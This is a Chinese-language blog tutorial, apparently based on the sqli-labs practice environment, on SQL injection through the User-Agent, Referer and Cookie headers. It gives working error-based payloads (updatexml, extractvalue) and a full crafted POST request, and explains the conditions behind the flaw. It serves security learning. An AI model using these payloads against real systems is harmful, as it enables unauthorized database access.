SQL注入之HTTP请求头注入

Ps&＃xff1a; 先做实验&＃xff0c;在有操作的基础上理解原理会更清晰更深入。

1. User-Agent注入

• 特点&＃xff1a;登陆后返回用户的 User-Agent --> 服务器端可能记录用户User-Agent

• 输入不合法数据报错

• payload:&＃39; and updatexml(1,concat("~",database(),"~"),1),&＃39;&＃39;,&＃39;&＃39;)-- clay

• 数据包

POST /sqli-labs/Less-18/index.php HTTP/1.1
Host: 10.49.102.86
Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,image/avif,image/webp,*/*;q&＃61;0.8
Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
X-Forward-For:
User-Agent:&＃39; and updatexml(1,concat("~",database(),"~"),1),&＃39;&＃39;,&＃39;&＃39;)-- clay
Upgrade-Insecure-Requests: 1submit&＃61;Submit&uname&＃61;admin&passwd&＃61;admin


• 备注&＃xff1a;

该注入是insert语句的注入&＃xff0c;完整SQL语句为&＃xff1a;

$insert&＃61;"INSERT INTO &＃96;security&＃39;. &＃39;uagents&＃39;( uagent&＃39;, &＃39; ip_address&＃39;, &＃39;username&＃39;)VALUES ( &＃39;$uagent&＃39; ,&＃39;$IP&＃39;, $uname)";


总结&＃xff1a;insert类型的SQL注入时&＃xff0c;在注入点闭合后就添加要执行的语句&＃xff0c;而不是&＃xff0c;闭合完整个insert语句后再添加要执行的语句。

2. Referer注入

特点&＃xff1a; 返回用户的Referer&＃xff0c;可能后端会记录该值

payload&＃xff1a;12138&＃39; and extractvalue(1,concat("~",database())) ,&＃39;&＃39;) -- clay

3. COOKIE注入

特点&＃xff1a; 返回&＃xff0c;后端可能记录User-Agent和COOKIE

把COOKIE的值删除后&＃xff1a;

payload&＃xff1a; &＃39; and updatexml(1,concat("~",database(),"~"),1) -- clay

一下均为自己的理解&＃xff0c;讲的大白话一点&＃xff0c;粗体是核心。

原理&＃xff1a;

HTTP头部注入产生的核心原因就是&＃xff0c;后端存在查询或记录HTTP请求头内容&＃xff08;数据库交互&＃xff09;

实验一&＃xff1a;后端记录 User-Agent &＃xff0c;insert 类型的注入

实验二&＃xff1a;后端记录 Referer &＃xff0c;insert 类型的注入

实验三&＃xff1a;后端查询 COOKIE &＃xff0c;select 类型的注入

不同的注入类型存在不同的闭合方式&＃xff0c;这个一点要注意&＃xff0c;除上述闭合类型以外&＃xff0c;当搜索框中存在注入时&＃xff0c;可能需要%的闭合&＃xff08;模糊查询 like %xxx%&＃xff09;

在这里还是再次强调一下SQL注入产生的条件&＃xff1a;用户输入的语句带入到数据库执行

1. 参数可控

2. 带入到数据库执行

HTTP头部注入也是一模一样&＃xff0c;用户可以控制HTTP请求头&＃xff0c;后端带入到数据库执行&＃xff0c;这两个条件缺一个都不可以&＃xff01;

如果对你有所帮助拜托拜托点赞收藏加评论666&＃xff0c;更多文章内容欢迎访问笔者博客 &＃xff1a;xclay.net